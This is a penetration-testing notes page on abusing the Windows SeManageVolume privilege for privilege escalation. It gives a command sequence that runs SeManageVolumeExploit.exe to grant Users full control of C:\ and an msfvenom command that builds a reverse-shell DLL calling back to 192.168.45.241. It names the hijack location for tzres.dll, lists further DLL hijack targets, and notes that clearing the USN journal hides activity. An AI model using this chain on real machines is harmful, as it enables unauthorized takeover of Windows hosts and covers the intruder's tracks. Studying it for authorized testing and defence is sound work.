SeManageVolume
The SeManageVolume privilege (aka Manage Volume) allows direct control over NTFS volumes, including the ability to clear the Update Sequence Number (USN) change journal, which logs every file and directory modification on a volume for forensic and backup purposes. Clearing the journal erases this history, making post-exploitation activity harder to detect.
Beyond this, the privilege can be actively exploited to gain write access to the entire volume. Tools such as SeManageVolumeExploit can leverage the privilege to modify permissions across C:\, effectively granting full control over all files and directories.
# Check permissions
> whoami /priv
Privilege Name Description State
============================= ================================ ========
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
# Run the exploit
> .\SeManageVolumeExploit.exe
# Check volume permissions
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(F) # Full AccessA SYSTEM level shell can be gain via DLL hijacking. For example, the tzres.dll can be used to perform a DLL hijack on systeminfo.
# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dllDropping the malicious DLL to C:\Windows\system32\wbem\tzres.dll and running systeminfo will load the DLL, executing code as NT AUTHORITY\NETWORK SERVICE.
The phoneinfo.dll can be also leveraged as shown here:
Other high-value DLL hijack targets for common Windows binaries:
systeminfo.exe
tzres.dll, wbemcomn.dll
C:\Windows\System32\wbem\
taskmgr.exe
UIAutomationCore.dll
C:\Windows\System32\
eventvwr.exe
mmc.dll, wevtapi.dll
C:\Windows\System32\
notepad.exe
dbghelp.dll, msvcrt.dll
C:\Windows\System32\
perfmon.exe
perfts.dll, perfc009.dll
C:\Windows\System32\
wmic.exe
fastprox.dll, wbemcomn.dll, wmiprvsd.dll
C:\Windows\System32\wbem\
winmgmt.exe
fastprox.dll, wbemcomn.dll
C:\Windows\System32\wbem\
mstsc.exe
rdpencom.dll, tsres.dll
C:\Windows\System32\
Last updated
Was this helpful?